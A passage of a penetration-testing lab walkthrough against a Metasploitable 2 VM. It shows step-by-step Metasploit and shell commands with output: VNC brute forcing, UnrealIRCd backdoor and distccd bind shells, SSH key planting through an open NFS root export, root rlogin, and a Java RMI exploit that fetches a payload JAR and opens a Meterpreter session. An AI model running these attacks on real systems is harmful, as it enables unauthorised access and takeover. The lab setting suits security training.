   47  exploit/windows/vnc/ultravnc_viewer_bof                             2008-02-06       normal     No     UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow                                                                                                       
   48  auxiliary/scanner/vnc/vnc_none_auth                                                  normal     No     VNC Authentication None Detection
   49  auxiliary/scanner/vnc/vnc_login                                                      normal     No     VNC Authentication Scanner

We have the vnc_login module. Select the module and see options.

msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > show options

Module options (auxiliary/scanner/vnc/vnc_login):

   Name              Current Setting                      Required  Description
   ----              ---------------                      --------  -----------
   BLANK_PASSWORDS   false                                no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                    yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none                                 no        Skip existing credentials stored in the current database (Accep
                                                                    ted: none, user, user&realm)
   PASSWORD                                               no        The password to test
   PASS_FILE         /usr/share/metasploit-framework/dat  no        File containing passwords, one per line
                     a/wordlists/vnc_passwords.txt
   Proxies                                                no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                 yes       The target host(s), see https://github.com/rapid7/metasploit-fr
                                                                    amework/wiki/Using-Metasploit
   RPORT             5900                                 yes       The target port (TCP)
   STOP_ON_SUCCESS   false                                yes       Stop guessing when a credential works for a host
   THREADS           1                                    yes       The number of concurrent threads (max one per
   USERNAME          <BLANK>                              no        A specific username to authenticate as
   USERPASS_FILE                                          no        File containing users and passwords separated
                                                                    r per line
   USER_AS_PASS      false                                no        Try the username as the password for all user
   USER_FILE                                              no        File containing usernames, one per line
   VERBOSE           true                                 yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

Set the username as root and set the target. We will be using default Metasploit wordlist.

msf6 auxiliary(scanner/vnc/vnc_login) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/vnc/vnc_login) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 auxiliary(scanner/vnc/vnc_login) > run

[*] 192.168.204.136:5900  - 192.168.204.136:5900 - Starting VNC login sweep
[!] 192.168.204.136:5900  - No active DB -- Credential data will not be saved!
[+] 192.168.204.136:5900  - 192.168.204.136:5900 - Login Successful: :password
[*] 192.168.204.136:5900  - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/vnc/vnc_login) > 

Run the exploit and we will have our password which is password.

Now, we can use VNC viewer to connect to target.

┌──(kali㉿kali)-[~]
└─$ vncviewer 192.168.204.136
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: 
Authentication successful
Desktop name "root's X desktop (metasploitable:0)"
VNC server default format:

Port 6667 ircd Exploitation Metasploitable2

Scanning port 6667

First scan the port with vuln script so see if we get some useful information

                                                                                                           
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vuln -p 6667 192.168.204.136 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-19 10:19 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00034s latency).

PORT     STATE SERVICE VERSION
6667/tcp open  irc     UnrealIRCd
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
MAC Address: 00:0C:29:71:62:0D (VMware)
Service Info: Host: irc.Metasploitable.LAN

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.89 seconds

We can see that it finds out that the port may have trojan in it.

Vulnerability Assessment

Let us see if searchsploit finds something.

──(kali㉿kali)-[~]
└─$ searchsploit unreal                                       
--------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                     |  Path
--------------------------------------------------------------------------------------------------- ---------------------------------
Epic Games Unreal Engine 436 - Client Unreal URL Denial of Service                                 | multiple/dos/22223.txt
Epic Games Unreal Engine 436 - Multiple Format String Vulnerabilities                              | multiple/remote/32363.txt
Epic Games Unreal Engine 436 - URL Directory Traversal                                             | multiple/remote/22224.txt
Epic Games Unreal Engine Logging Function - Remote Denial of Service                               | multiple/dos/30513.txt
Epic Games Unreal Tournament Engine 3 - UMOD Manifest.INI Arbitrary File Overwrite                 | multiple/remote/24041.c
Epic Games Unreal Tournament Server 436.0 - Denial of Service Amplifier                            | multiple/dos/21593.txt
Epic Games Unreal Tournament Server 436.0 - Engine Remote Format String                            | multiple/dos/23799.txt
Unreal Commander 0.92 - Directory Traversal                                                        | windows/remote/30569.py
Unreal Commander 0.92 - ZIP / RAR Archive Handling Traversal Arbitrary File Overwrite              | multiple/remote/30521.txt
Unreal Engine - 'ReceivedRawBunch()' Denial of Service                                             | multiple/dos/34340.txt
Unreal Engine - 'UnChan.cpp' Failed Assertion Remote Denial of Service                             | multiple/dos/32386.txt
Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow (PoC)                 | multiple/dos/34261.txt
Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service                                | multiple/dos/32362.txt
Unreal Tournament - Remote Buffer Overflow (SEH)                                                   | windows/remote/16145.pl
Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit)                             | linux/remote/16848.rb
Unreal Tournament 2004 (Windows) - 'secure' Remote Overflow (Metasploit)                           | windows/remote/16693.rb
Unreal Tournament 2004 - 'Secure' Remote Overflow (Metasploit)                                     | linux/remote/10032.rb
Unreal Tournament 2004 - Null Pointer Remote Denial of Service                                     | multiple/dos/32125.txt
Unreal Tournament 3 - Memory Corruption (Denial of Service)                                        | multiple/dos/32127.txt
Unreal Tournament 3 1.3 - Directory Traversal                                                      | windows/remote/6506.txt
Unreal Tournament 3 2.1 - 'STEAMBLOB' Remote Denial of Service                                     | windows/dos/14414.txt
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)                                       | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow                                            | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                                                     | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                                                          | windows/dos/27407.pl
-------------------------------------------

We do have UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) .

Unreal IRCD Exploitation with Metasploit

Let us fire up metasploit and exploit it.

msf6 > search unreal

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/linux/games/ut2004_secure           2004-06-18       good       Yes    Unreal Tournament 2004 "secure" Overflow (Linux)
   1  exploit/windows/games/ut2004_secure         2004-06-18       good       Yes    Unreal Tournament 2004 "secure" Overflow (Win32)
   2  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution


Interact with a module by name or index. For example info 2, use 2 or use exploit/unix/irc/unreal_ircd_3281_backdoor

msf6 > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136

Set the payload as cmd/unix/bind_ruby .

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   1   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2   payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   3   payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   4   payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   5   payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   6   payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   7   payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   8   payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   9   payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   10  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   11  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_ruby 
payload => cmd/unix/bind_ruby

Now run it, and we will get the shell.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] 192.168.204.136:6667 - Connected to 192.168.204.136:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.204.136:6667 - Sending backdoor command...
[*] Started bind TCP handler against 192.168.204.136:4444
[*] Command shell session 1 opened (192.168.204.135:38267 -> 192.168.204.136:4444) at 2024-03-19 10:26:45 -0400

ls
Donation
LICENSE
aliases
badwords.channel.conf
badwords.message.conf

Port 2049 NFS Exploitation Metasploitable 2

First quickly scan the target.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 2049  192.168.204.136
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 02:30 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00036s latency).

PORT     STATE SERVICE
2049/tcp open  nfs
MAC Address: 00:0C:29:71:62:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

We can see that the port is open. Now we can see what NFS shares are available to be mounted.

┌──(kali㉿kali)-[~] └─$ showmount -e 192.168.204.136

Export list for 192.168.204.136: / *

The command showmount -e 192.168.204.136 is used to display the list of directories shared by an NFS (Network File System) server located at the IP address 192.168.204.136.

The output you provided indicates that there is one shared directory available on the NFS server at that IP address. Here's the breakdown of the output:

  • Export list for 192.168.204.136:: This line indicates that the following list displays the directories that are exported (shared) by the NFS server at the specified IP address.

  • / *: This line specifies the shared directory and its export options. In this case, / represents the root directory of the file system, and * indicates that it is exported to all hosts. This means that any host in the network that has access to the NFS server can mount this directory and access its contents.

In summary, the output indicates that the NFS server at 192.168.204.136 is sharing its root directory (/) to all hosts on the network.

Now, we can mount it.

┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/nfs
[sudo] password for kali: 
                                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 192.168.204.136:/ /mnt/nfs

Created symlink /run/systemd/system/remote-fs.target.wants/rpc-statd.service → /usr/lib/systemd/system/rpc-statd.service.

┌──(kali㉿kali)-[~]
└─$ df -k
Filesystem        1K-blocks     Used Available Use% Mounted on
udev                1963284        0   1963284   0% /dev
tmpfs                401016     1268    399748   1% /run
/dev/sda1          82083148 14386412  63481188  19% /
tmpfs               2005072        0   2005072   0% /dev/shm
tmpfs                  5120        0      5120   0% /run/lock
tmpfs                401012      128    400884   1% /run/user/1000
192.168.204.136:/   7282176  1486656   5428544  22% /mnt/nfs

                                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ cd /mnt/nfs
                                                                                                                                     
┌──(kali㉿kali)-[/mnt/nfs]
└─$ ls
bin   cdrom  etc   initrd      lib         media  nohup.out  proc  sbin  sys  usr  vmlinuz
boot  dev    home  initrd.img  lost+found  mnt    opt        root  srv   tmp  var
                                                                  

Now we can generate a SSH key.

┌──(root㉿kali)-[/home/kali]
└─# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:fPlTqIgu9KBlLupk7ZEBlm9RZSNxmDvjuF7EBi4MqQw root@kali
The key's randomart image is:
+---[RSA 3072]----+
|     +==         |
| .. .o+ .        |
|E+ o  .          |
|B + ++ .   . .   |
|.+ =o+o S o . .  |
|  +.X. . o o .   |
| o X.+. . . o    |
|o +.=..      .   |
|oo.+ ..          |
+----[SHA256]-----+

Now copy the public key to target ssh folder.

┌──(root㉿kali)-[~/.ssh]
└─# ls    
id_rsa  id_rsa.pub
                                                                                                                                                                       
┌──(root㉿kali)-[~/.ssh]
└─# cp id_rsa.pub /mnt/nfs/root/.ssh/

Now, append it to authorized keys file.

┌──(root㉿kali)-[/mnt/nfs/root/.ssh]
└─# cat id_rsa.pub >> authorized_keys

We can now connect to our machine with SSH. (Having errors)

Ports 512,513,514 remote services exploitations - Metasploitable 2

TCP ports 512, 513, and 514 are known as "r" services, and have been misconfigured to allow remote access from any host (a standard ".rhosts + +" situation).

Lets scan if these ports are open.

──(kali㉿kali)-[/]
└─$ sudo nmap -p 512,513,514  192.168.204.136
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 04:26 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00052s latency).

PORT    STATE SERVICE
512/tcp open  exec
513/tcp open  login
514/tcp open  shell
MAC Address: 00:0C:29:71:62:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

Now we can connect to it.

┌──(kali㉿kali)-[/]
└─$ rlogin -l root 192.168.204.136
Last login: Sat Apr 27 02:22:48 EDT 2024 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# 

Port 3632 distccd exploitation - Metasploitable 2

This program makes it easy to scale large compiler jobs across a farm of like-configured systems. The problem with this service is that an attacker can easily abuse it to run a command of their choice.

Let us scan it.

┌──(kali㉿kali)-[/]
└─$ sudo nmap -p 3632 --script=vuln 192.168.204.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 04:47 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00058s latency).

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-cve2004-2687: 
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|       
|     Disclosure date: 2002-02-01
|     Extra information:
|       
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|   
|     References:
|       https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
|_      https://distcc.github.io/security.html
MAC Address: 00:0C:29:71:62:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 11.18 seconds

We can now use metasploit to exploit it.

msfconsole
msf6 > use exploit/unix/misc/distcc_exec
[*] No payload configured, defaulting to cmd/unix/reverse_bash
msf6 exploit(unix/misc/distcc_exec) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136

msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/bind_ruby
payload => cmd/unix/bind_ruby
msf6 exploit(unix/misc/distcc_exec) > run

[*] Started bind TCP handler against 192.168.204.136:4444
[*] Command shell session 1 opened (192.168.204.137:44185 -> 192.168.204.136:4444) at 2024-04-27 04:54:44 -0400

id
uid=1(daemon) gid=1(daemon) 

Port 1099 - Java-rmi exploitation - Metasploitable 2

Let us first scan the target.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 1099 -sC -sV --script=vuln 192.168.204.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 01:11 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00088s latency).

PORT     STATE SERVICE  VERSION
1099/tcp open  java-rmi GNU Classpath grmiregistry
| rmi-vuln-classloader: 
|   VULNERABLE:
|   RMI registry default configuration remote code execution vulnerability
|     State: VULNERABLE
|       Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
|       
|     References:
|_      https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb
MAC Address: 00:0C:29:71:62:0D (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.42 seconds
                                                               

Now, we can use metasploit JAVA RMI module to exploit it.

┌──(kali㉿kali)-[~]
└─$ msfconsole                    
msf6 > search java rmi

Matching Modules
================

   #   Name                                                             Disclosure Date  Rank       Check  Description
   -   ----                                                             ---------------  ----       -----  -----------
   0   exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce  2019-05-22       excellent  Yes    Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE
   1   exploit/multi/misc/java_jmx_server                               2013-05-22       excellent  Yes    Java JMX Server Insecure Configuration Java Code Execution
   2   auxiliary/scanner/misc/java_jmx_server                           2013-05-22       normal     No     Java JMX Server Insecure Endpoint Code Execution Scanner
   3   auxiliary/gather/java_rmi_registry                                                normal     No     Java RMI Registry Interfaces Enumeration
   4   exploit/multi/misc/java_rmi_server                               2011-10-15       excellent  Yes    Java RMI Server Insecure Default Configuration Java Code Execution
   5   auxiliary/scanner/misc/java_rmi_server                           2011-10-15       normal     No     Java RMI Server Insecure Endpoint Code Execution Scanner
   6   exploit/multi/browser/java_rmi_connection_impl                   2010-03-31       excellent  No     Java RMIConnectionImpl Deserialization Privilege Escalation
   7   exploit/multi/browser/java_signed_applet                         1997-02-19       excellent  No     Java Signed Applet Social Engineering Code Execution
   8   exploit/multi/http/jenkins_metaprogramming                       2019-01-08       excellent  Yes    Jenkins ACL Bypass and Metaprogramming RCE
   9   exploit/linux/misc/jenkins_java_deserialize                      2015-11-18       excellent  Yes    Jenkins CLI RMI Java Deserialization Vulnerability
   10  exploit/linux/http/kibana_timelion_prototype_pollution_rce       2019-10-30       manual     Yes    Kibana Timelion Prototype Pollution RCE
   11  exploit/multi/browser/firefox_xpi_bootstrapped_addon             2007-06-27       excellent  No     Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
   12  exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315       2023-05-26       excellent  Yes    Openfire authentication bypass with RCE plugin
   13  exploit/multi/http/torchserver_cve_2023_43654                    2023-10-03       excellent  Yes    PyTorch Model Server Registration and Deserialization RCE
   14  exploit/multi/http/totaljs_cms_widget_exec                       2019-08-30       excellent  Yes    Total.js CMS 12 Widget JavaScript Code Injection
   15  exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc           2021-09-21       manual     Yes    VMware vCenter vScalation Priv Esc


Interact with a module by name or index. For example info 15, use 15 or use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc

msf6 > use 4
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 exploit(multi/misc/java_rmi_server) > exploit

[*] Started reverse TCP handler on 192.168.204.137:4444 
[*] 192.168.204.136:1099 - Using URL: http://192.168.204.137:8080/qhpKsPkUu
[*] 192.168.204.136:1099 - Server started.
[*] 192.168.204.136:1099 - Sending RMI Header...
[*] 192.168.204.136:1099 - Sending RMI Call...
[*] 192.168.204.136:1099 - Replied to request for payload JAR
[*] Sending stage (57971 bytes) to 192.168.204.136
[*] Meterpreter session 1 opened (192.168.204.137:4444 -> 192.168.204.136:48969) at 2024-04-28 01:50:00 -0400

meterpreter > Interrupt: use the 'exit' command to quit

Port 5432 Postgresql Exploitation - Metasploitable 2

Let us first scan the target.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 5432 -sC -sV --script=vuln 192.168.204.136
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 02:06 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00034s latency).

PORT     STATE SERVICE    VERSION
5432/tcp open  postgresql PostgreSQL DB 8.3.0 - 8.3.7
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://www.securityfocus.com/bid/70574
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       http://www.cvedetails.com/cve/2014-0224
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_      http://www.openssl.org/news/secadv_20140605.txt
| vulners: 
|   cpe:/a:postgresql:postgresql:8.3: 
|       SSV:60718       10.0    https://vulners.com/seebug/SSV:60718    *EXPLOIT*
|       PRION:CVE-2013-1903     10.0    https://vulners.com/prion/PRION:CVE-2013-1903
|       PRION:CVE-2013-1902     10.0    https://vulners.com/prion/PRION:CVE-2013-1902
|       CVE-2013-1903   10.0    https://vulners.com/cve/CVE-2013-1903
|       CVE-2013-1902   10.0    https://vulners.com/cve/CVE-2013-1902
|       CVE-2019-10164  9.0     https://vulners.com/cve/CVE-2019-10164
|       SSV:30015       8.5     https://vulners.com/seebug/SSV:30015    *EXPLOIT*
|       SSV:19652       8.5     https://vulners.com/seebug/SSV:19652    *EXPLOIT*
|       PRION:CVE-2010-1447     8.5     https://vulners.com/prion/PRION:CVE-2010-1447
|       PRION:CVE-2010-1169     8.5     https://vulners.com/prion/PRION:CVE-2010-1169
|       POSTGRESQL:CVE-2013-1900        8.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2013-1900
|       POSTGRESQL:CVE-2010-1169        8.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2010-1169
|       CVE-2010-1447   8.5     https://vulners.com/cve/CVE-2010-1447
|       CVE-2010-1169   8.5     https://vulners.com/cve/CVE-2010-1169
|       SSV:19754       7.5     https://vulners.com/seebug/SSV:19754    *EXPLOIT*
|       CVE-2015-3166   7.5     https://vulners.com/cve/CVE-2015-3166
|       CVE-2015-0244   7.5     https://vulners.com/cve/CVE-2015-0244
|       SSV:30152       6.8     https://vulners.com/seebug/SSV:30152    *EXPLOIT*
|       SECURITYVULNS:VULN:10252        6.8     https://vulners.com/securityvulns/SECURITYVULNS:VULN:10252
|       PRION:CVE-2013-0255     6.8     https://vulners.com/prion/PRION:CVE-2013-0255
|       PRION:CVE-2012-0868     6.8     https://vulners.com/prion/PRION:CVE-2012-0868
|       PRION:CVE-2009-3231     6.8     https://vulners.com/prion/PRION:CVE-2009-3231
|       POSTGRESQL:CVE-2013-0255        6.8     https://vulners.com/postgresql/POSTGRESQL:CVE-2013-0255
|       POSTGRESQL:CVE-2012-0868        6.8     https://vulners.com/postgresql/POSTGRESQL:CVE-2012-0868
|       POSTGRESQL:CVE-2009-3231        6.8     https://vulners.com/postgresql/POSTGRESQL:CVE-2009-3231
|       CVE-2013-0255   6.8     https://vulners.com/cve/CVE-2013-0255
|       CVE-2012-0868   6.8     https://vulners.com/cve/CVE-2012-0868
|       CVE-2009-3231   6.8     https://vulners.com/cve/CVE-2009-3231
|       SSV:62083       6.5     https://vulners.com/seebug/SSV:62083    *EXPLOIT*
|       SSV:62016       6.5     https://vulners.com/seebug/SSV:62016    *EXPLOIT*
|       SSV:61543       6.5     https://vulners.com/seebug/SSV:61543    *EXPLOIT*
|       SSV:19018       6.5     https://vulners.com/seebug/SSV:19018    *EXPLOIT*
|       SSV:15153       6.5     https://vulners.com/seebug/SSV:15153    *EXPLOIT*
|       SSV:15097       6.5     https://vulners.com/seebug/SSV:15097    *EXPLOIT*
|       SSV:15095       6.5     https://vulners.com/seebug/SSV:15095    *EXPLOIT*
|       SECURITYVULNS:VULN:10803        6.5     https://vulners.com/securityvulns/SECURITYVULNS:VULN:10803
|       SECURITYVULNS:VULN:10473        6.5     https://vulners.com/securityvulns/SECURITYVULNS:VULN:10473
|       PRION:CVE-2014-0065     6.5     https://vulners.com/prion/PRION:CVE-2014-0065
|       PRION:CVE-2014-0064     6.5     https://vulners.com/prion/PRION:CVE-2014-0064
|       PRION:CVE-2014-0063     6.5     https://vulners.com/prion/PRION:CVE-2014-0063
|       PRION:CVE-2014-0061     6.5     https://vulners.com/prion/PRION:CVE-2014-0061
|       PRION:CVE-2012-0866     6.5     https://vulners.com/prion/PRION:CVE-2012-0866
|       PRION:CVE-2010-4015     6.5     https://vulners.com/prion/PRION:CVE-2010-4015
|       PRION:CVE-2010-0442     6.5     https://vulners.com/prion/PRION:CVE-2010-0442
|       POSTGRESQL:CVE-2014-0065        6.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0065
|       POSTGRESQL:CVE-2014-0064        6.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0064
|       POSTGRESQL:CVE-2014-0063        6.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0063
|       POSTGRESQL:CVE-2014-0061        6.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0061
|       POSTGRESQL:CVE-2012-0866        6.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2012-0866
|       POSTGRESQL:CVE-2010-4015        6.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2010-4015
|       POSTGRESQL:CVE-2009-4136        6.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2009-4136
|       POSTGRESQL:CVE-2009-3230        6.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2009-3230
|       CVE-2021-32027  6.5     https://vulners.com/cve/CVE-2021-32027
|       CVE-2015-0243   6.5     https://vulners.com/cve/CVE-2015-0243
|       CVE-2015-0242   6.5     https://vulners.com/cve/CVE-2015-0242
|       CVE-2015-0241   6.5     https://vulners.com/cve/CVE-2015-0241
|       CVE-2014-0065   6.5     https://vulners.com/cve/CVE-2014-0065
|       CVE-2014-0064   6.5     https://vulners.com/cve/CVE-2014-0064
|       CVE-2014-0063   6.5     https://vulners.com/cve/CVE-2014-0063
|       CVE-2014-0061   6.5     https://vulners.com/cve/CVE-2014-0061
|       CVE-2012-0866   6.5     https://vulners.com/cve/CVE-2012-0866
|       CVE-2010-4015   6.5     https://vulners.com/cve/CVE-2010-4015
|       CVE-2010-0442   6.5     https://vulners.com/cve/CVE-2010-0442
|       SECURITYVULNS:VULN:11183        6.0     https://vulners.com/securityvulns/SECURITYVULNS:VULN:11183
|       PRION:CVE-2010-3433     6.0     https://vulners.com/prion/PRION:CVE-2010-3433
|       PRION:CVE-2010-1170     6.0     https://vulners.com/prion/PRION:CVE-2010-1170
|       POSTGRESQL:CVE-2010-3433        6.0     https://vulners.com/postgresql/POSTGRESQL:CVE-2010-3433
|       POSTGRESQL:CVE-2010-1170        6.0     https://vulners.com/postgresql/POSTGRESQL:CVE-2010-1170
|       CVE-2022-2625   6.0     https://vulners.com/cve/CVE-2022-2625
|       CVE-2018-10915  6.0     https://vulners.com/cve/CVE-2018-10915
|       CVE-2010-3433   6.0     https://vulners.com/cve/CVE-2010-3433
|       CVE-2010-1170   6.0     https://vulners.com/cve/CVE-2010-1170
|       SSV:15154       5.8     https://vulners.com/seebug/SSV:15154    *EXPLOIT*
|       SSV:15096       5.8     https://vulners.com/seebug/SSV:15096    *EXPLOIT*
|       POSTGRESQL:CVE-2009-4034        5.8     https://vulners.com/postgresql/POSTGRESQL:CVE-2009-4034
|       CVE-2023-2454   5.8     https://vulners.com/cve/CVE-2023-2454
|       SSV:19669       5.5     https://vulners.com/seebug/SSV:19669    *EXPLOIT*
|       PRION:CVE-2010-1975     5.5     https://vulners.com/prion/PRION:CVE-2010-1975
|       POSTGRESQL:CVE-2010-1975        5.5     https://vulners.com/postgresql/POSTGRESQL:CVE-2010-1975
|       CVE-2023-2455   5.5     https://vulners.com/cve/CVE-2023-2455
|       CVE-2010-1975   5.5     https://vulners.com/cve/CVE-2010-1975
|       CVE-2021-23214  5.1     https://vulners.com/cve/CVE-2021-23214
